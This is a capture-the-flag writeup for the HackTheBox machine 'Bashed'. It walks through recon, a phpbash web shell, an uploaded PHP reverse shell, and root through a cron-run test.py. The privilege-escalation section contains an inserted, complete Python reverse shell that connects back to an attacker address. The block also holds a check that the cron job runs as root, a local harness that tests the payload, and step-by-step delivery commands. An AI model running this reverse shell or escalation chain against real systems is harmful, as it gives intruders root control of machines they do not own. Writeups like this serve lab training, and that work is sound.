Bashed HTB Writeup
Hi everyone, this is my writeup for the box “Bashed” from HackTheBox.
Nudge Section :
- Visit /dev to get a web shell,
- From the phpbash web shell, drop a PHP reverse shell into the /uploads directory and browse to it to get a reverse shell,
- Replace the contents of test.py with reverse-shell code; the cron job that runs it as root will hand you a root shell.
Machine IP Address : 10.10.10.68
Part 1 : Recon
1. Starting off with an Nmap Scan to get information about the open ports.
nmap -sC -sV -Pn 10.10.10.68
We get the following results from the nmap scan (-Pn skips host discovery, which helps when the target does not answer ping):
Only one port is open.
Port 80 : Apache 2.4.18
2. Before enumerating further, let’s run a gobuster directory scan.
gobuster dir -u http://10.10.10.68/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -e
We get some interesting directories from the scan:
/uploads, /php and /dev
Part 2: Enumeration
- Let’s begin our enumeration by visiting the webpage on port 80
Clicking the arrow next to phpbash on the front page leads us to http://10.10.10.68/single.html, which links to a GitHub repository ( https://github.com/Arrexel/phpbash ) describing phpbash as a standalone, semi-interactive web shell.
The GitHub repository gives us juicy information on how to access the shell.
The screenshot on the GitHub page shows the web shell being served from the uploads directory, and the same directory showed up in our gobuster scan.
BUT!! visiting /uploads only shows a blank page. Don’t worry, let’s visit the other interesting directory from the gobuster scan.
Visiting /dev gives us a directory index listing the web shells.
Part 3 : Getting User Flag
Opening one of the web shells listed in /dev gives us a shell as Apache’s default user, www-data. Now let’s try to get the user flag.
The user flag is in the home directory of the user arrexel.
Part 4 : Getting Root Flag
Now let’s try privilege escalation. Running sudo -l gives us some juicy information: www-data can run commands as the scriptmanager user without a password. Let’s take note of it for later use.
Now let’s try to get linPEAS.sh in order to gather information for privilege escalation. I tried several ways (wget, curl, git clone, the upload functionality of phpbash) to get the script, but I got no success. So I started manually enumerating the box and also thinking about getting a reverse shell to our host machine.
As I was stuck at this point, I took a break and decided to come back later.
I started again by going through the gobuster scan. I got a PHP file in the /php directory, but it was also a dead end.
Now we are left with the /uploads directory. So I thought: what if we could create a file in the /uploads directory using the web shell and access it by visiting its URL? And BINGO!! we can do that. Now let’s upload a PHP reverse shell.
Now it’s time to get a reverse shell. Don’t forget to start a netcat listener on your machine first.
First of all, let us stabilise the shell by spawning a pty (note the straight quotes; curly quotes will not work):
python3 -c 'import pty; pty.spawn("/bin/bash")'
Remember the result we got from sudo -l. Switch to the scriptmanager user with:
sudo -u scriptmanager bash
Now let’s enumerate the box further as scriptmanager.
The scripts directory stands out, so let’s take a look inside it.
Reading test.py shows that test.py and test.txt are related: test.py is what writes test.txt.
Now observe that test.txt is owned by root, which means whatever is executing test.py is doing so as root. So if we put reverse-shell code in test.py, the shell we get back will run as root!! Let’s remove the original test.py and replace it with a test.py, created on our local machine, that contains reverse-shell code.
We can transfer the file with a Python web server on our local machine and wget on the Bashed machine. On the local machine, in the directory containing the new test.py:
python3 -m http.server
test.py is run by a cron job, so just wait up to a minute for the reverse shell to land on your listener.
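To make the privesc step concrete, here is an added example (my own code, not the writeup’s or the box’s original test.py) of what the replacement test.py could look like, plus two helpers a practitioner would want before dropping it: a pre-flight check that test.txt really is root-owned and freshly rewritten (so the cron job is live and runs as root), and a local dry run of the connect-back against a throwaway listener that stands in for netcat. The attacker address 10.10.14.5:4444, the name of the listener port and the location of test.txt are assumptions, not values from the page.

```python
#!/usr/bin/env python3
"""Replacement test.py: Python reverse shell plus a pre-flight check.

Added example, not the box's original test.py. Assumptions (not from the
page): the attacker listener is 10.10.14.5:4444 and test.txt sits in the
same directory as this script.
"""
import os
import socket
import subprocess
import threading
import time

ATTACKER_HOST = "10.10.14.5"   # assumption: your HTB VPN address
ATTACKER_PORT = 4444           # assumption: port your nc listener is on
TEST_TXT = "test.txt"          # assumption: file the original test.py writes


def looks_like_root_cron(owner_uid, mtime, now=None, period=60):
    """Is the artefact root-owned and rewritten within the last cron period?

    (a) owner uid 0 means whoever runs test.py is root;
    (b) a fresh mtime means the job is actually still firing.
    """
    if now is None:
        now = time.time()
    return owner_uid == 0 and (now - mtime) <= period


def check_target(path=TEST_TXT):
    """Apply looks_like_root_cron() to a real file; False if it is missing."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return looks_like_root_cron(st.st_uid, st.st_mtime)


def reverse_shell(host, port, shell="/bin/sh"):
    """Connect back to host:port and hand the socket to an interactive shell.

    The child's stdin/stdout/stderr all point at the socket (the classic
    dup2 pattern, done here through Popen's fd arguments). Returns the
    shell's exit status once the remote side ends the session.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    fd = s.fileno()
    proc = subprocess.Popen([shell, "-i"], stdin=fd, stdout=fd, stderr=fd)
    rc = proc.wait()
    s.close()
    return rc


def local_dry_run(script=b"echo reverse-shell-ok\nexit\n", timeout=10):
    """Exercise reverse_shell() against a throwaway listener on localhost.

    Stands in for `nc -lvnp`: accepts one connection, feeds it `script`,
    and returns everything the shell sent back. Lets you confirm the
    payload works before dropping it on the box.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # ephemeral port, no clash with anything
    srv.listen(1)
    port = srv.getsockname()[1]
    got = bytearray()

    def listener():
        conn, _ = srv.accept()
        conn.settimeout(timeout)
        conn.sendall(script)
        try:
            while True:
                chunk = conn.recv(4096)
                if not chunk:         # shell exited and socket closed
                    break
                got.extend(chunk)
        except socket.timeout:
            pass
        conn.close()

    t = threading.Thread(target=listener, daemon=True)
    t.start()
    reverse_shell("127.0.0.1", port)
    t.join(timeout)
    srv.close()
    return bytes(got)


if __name__ == "__main__":
    # On the box, cron runs this file as root about once a minute, so the
    # connect-back below reaches the attacker's listener as root.
    reverse_shell(ATTACKER_HOST, ATTACKER_PORT)
```

Run check_target() against test.txt from the scriptmanager shell before the swap, not after: once the original test.py is gone, nothing refreshes test.txt and the mtime check will start failing even though the cron job is still running. Then serve the file with python3 -m http.server, fetch it on the box with wget (http://10.10.14.5:8000/test.py in this example), move it over test.py, start nc -lvnp 4444 on the attacker side, and wait for the next cron run.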
Annddddd…. finally the machine is pwned.
Thanks for reading the writeup. I hope you liked it; any feedback or suggestions are appreciated. You can reach out to me on:
Twitter : https://twitter.com/Viren2737